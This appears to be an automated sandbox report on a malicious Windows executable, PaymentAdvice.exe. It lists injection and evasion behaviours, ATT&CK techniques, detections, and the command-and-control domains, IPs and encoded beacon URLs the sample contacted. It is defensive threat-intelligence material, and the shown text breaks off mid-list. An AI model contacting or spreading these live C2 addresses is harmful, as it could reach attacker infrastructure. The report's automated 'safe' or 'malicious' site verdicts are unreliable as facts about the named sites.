          Source: Yara matchFile source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1DLL Side-Loading1Process Injection612Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery141Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383926 Sample: PaymentAdvice.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.weatherdekniagara.com 2->31 33 www.vtz6whu5254xb1.xyz 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 8 other signatures 2->47 11 PaymentAdvice.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\ic4muy4.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Contains functionality to prevent local Windows debugging 11->63 15 PaymentAdvice.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.brandschutzglas.com 81.19.159.73, 49732, 80 WORLD4YOUAT Austria 18->35 37 hispanicalinguablog.com 108.167.140.96, 49733, 80 UNIFIEDLAYER-AS-1US United States 18->37 39 13 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PaymentAdvice.exe33%VirustotalBrowse
          PaymentAdvice.exe25%ReversingLabsWin32.Spyware.Noon
          PaymentAdvice.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.PaymentAdvice.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msiexec.exe.95a558.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.msiexec.exe.4b47960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.1.PaymentAdvice.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.PaymentAdvice.exe.2680000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.puebloregentseniorliving.com/c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.hispanicalinguablog.com/c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m100%Avira URL Cloudmalware
          http://www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.unmanglement.com/c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.plataformaporelmarcanario.com/c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.saturnkorp.net/c22b/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.plataformaporelmarcanario.com
          52.142.208.184
          truetrue
            unknown
            hispanicalinguablog.com
            108.167.140.96
            truetrue
              unknown
              www.weatherdekniagara.com
              154.90.117.58
              truetrue
                unknown
                www.sgdivergence.com
                199.59.242.153
                truetrue
                  unknown
                  www.saturnkorp.net
                  75.126.101.233
                  truetrue
                    unknown
                    www.abolishlawinforcement.com
                    66.96.162.131
                    truetrue
                      unknown
                      www.dajiangzhibo12.com
                      104.21.85.234
                      truetrue
                        unknown
                        webinast.com
                        35.214.93.182
                        truetrue
                          unknown
                          puebloregentseniorliving.com
                          184.168.131.241
                          truetrue
                            unknown
                            www.brandschutzglas.com
                            81.19.159.73
                            truetrue
                              unknown
                              unmanglement.com
                              34.102.136.180
                              truefalse
                                unknown
                                www.vtz6whu5254xb1.xyz
                                49.156.179.238
                                truetrue
                                  unknown
                                  www.unmanglement.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.hispanicalinguablog.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.webinast.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.puebloregentseniorliving.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.anchor-little.com
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.puebloregentseniorliving.com/c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.hispanicalinguablog.com/c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.unmanglement.com/c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4mfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.plataformaporelmarcanario.com/c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4mtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            www.saturnkorp.net/c22b/true
                                            • Avira URL Cloud: malware
                                            low

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.tiro.comexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.goodfont.co.krexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.carterandcone.comlexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.typography.netDexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fonts.comexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                199.59.242.153
                                                                www.sgdivergence.comUnited States
                                                                395082BODIS-NJUStrue
                                                                35.214.93.182
                                                                webinast.comUnited States
                                                                19527GOOGLE-2UStrue
                                                                81.19.159.73
                                                                www.brandschutzglas.comAustria
                                                                38955WORLD4YOUATtrue
                                                                52.142.208.184
                                                                www.plataformaporelmarcanario.comUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                75.126.101.233
                                                                www.saturnkorp.netUnited States
                                                                36351SOFTLAYERUStrue
                                                                104.21.85.234
                                                                www.dajiangzhibo12.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                108.167.140.96
                                                                hispanicalinguablog.comUnited States
                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                34.102.136.180
                                                                unmanglement.comUnited States
                                                                15169GOOGLEUSfalse
                                                                66.96.162.131
                                                                www.abolishlawinforcement.comUnited States
                                                                29873BIZLAND-SDUStrue
                                                                184.168.131.241
                                                                puebloregentseniorliving.comUnited States
                                                                26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:383926
                                                                Start date:08.04.2021
                                                                Start time:12:37:46
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 9m 52s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:PaymentAdvice.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:25
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/3@13/10
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 20.4% (good quality ratio 18.6%)
                                                                • Quality average: 75%
                                                                • Quality standard deviation: 31.3%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • TCP Packets have been reduced to 100
                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 168.61.161.212, 104.43.193.48, 95.100.54.203, 20.82.209.183, 40.88.32.150, 23.10.249.26, 23.10.249.43, 23.0.174.185, 23.0.174.200, 20.54.26.129, 20.82.210.154
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                199.59.242.1530BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
                                                                RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                • www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
                                                                New Order.exeGet hashmaliciousBrowse
                                                                • www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
                                                                ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                • www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
                                                                payment.exeGet hashmaliciousBrowse
                                                                • www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
                                                                Order.exeGet hashmaliciousBrowse
                                                                • www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
                                                                SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                • www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
                                                                swift_76567643.exeGet hashmaliciousBrowse
                                                                • www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
                                                                Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                • www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
                                                                2021-04-01.exeGet hashmaliciousBrowse
                                                                • www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                • www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
                                                                ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                • www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
                                                                Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                • www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                PO.1183.exeGet hashmaliciousBrowse
                                                                • www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
                                                                Scan-45679.exeGet hashmaliciousBrowse
                                                                • www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
                                                                TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                • www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP
                                                                DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                • www.atualizacao.net/vsk9/?GFQH8=DklfZSbfSG8rWu2eKGFDH5WZs9/qq3j2XcYy6rNlSIz25CVNqPMMuncxEVlgc+oIXeWq&llsp=gTULpTwpERQd0J
                                                                9tRIEZUd1j.exeGet hashmaliciousBrowse
